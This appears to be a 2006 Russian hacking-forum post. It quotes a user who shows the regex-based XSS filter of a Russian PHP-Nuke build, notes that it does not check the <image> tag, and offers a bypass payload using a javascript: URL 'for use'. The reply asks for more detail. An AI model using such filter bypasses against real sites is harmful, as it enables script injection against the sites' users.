Показать сообщение отдельно

  #2  
Старый 24.02.2006, 00:32
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355

Репутация: 241
По умолчанию

Цитата:
Сообщение от Dr0ne  
я просмотрел код нюки на русском на нашел брешь в проверке на XSS
PHP код:
if (!defined('ADMIN_FILE')) {     foreach ($_GET as $sec_key => $secvalue) {         if ((eregi("<[^>]*script*\"?[^>]*>"$secvalue)) ||         (eregi("<[^>]*object*\"?[^>]*>"$secvalue)) ||         (eregi("<[^>]*iframe*\"?[^>]*>"$secvalue)) ||         (eregi("<[^>]*applet*\"?[^>]*>"$secvalue)) ||         (eregi("<[^>]*meta*\"?[^>]*>"$secvalue)) ||         (eregi("<[^>]*style*\"?[^>]*>"$secvalue)) ||         (eregi("<[^>]*form*\"?[^>]*>"$secvalue)) ||         (eregi("<[^>]*img*\"?[^>]*>"$secvalue)) ||         (eregi("<[^>]*onmouseover*\"?[^>]*>"$secvalue)) ||         (eregi("\([^>]*\"?[^)]*\)"$secvalue)) ||         (eregi("\""$secvalue)) ||         (eregi("forum_admin"$sec_key)) ||         (eregi("inside_mod"$sec_key))) { 
тут нет проверки на тэг <image >
атаку можно провести так
Код HTML:
<image src=javascript:alert('ok')>
пользуйтесь. будут вопросы - обращайтесь
RE конечно, но хотелось бы немного поподробнее....
 
Ответить с цитированием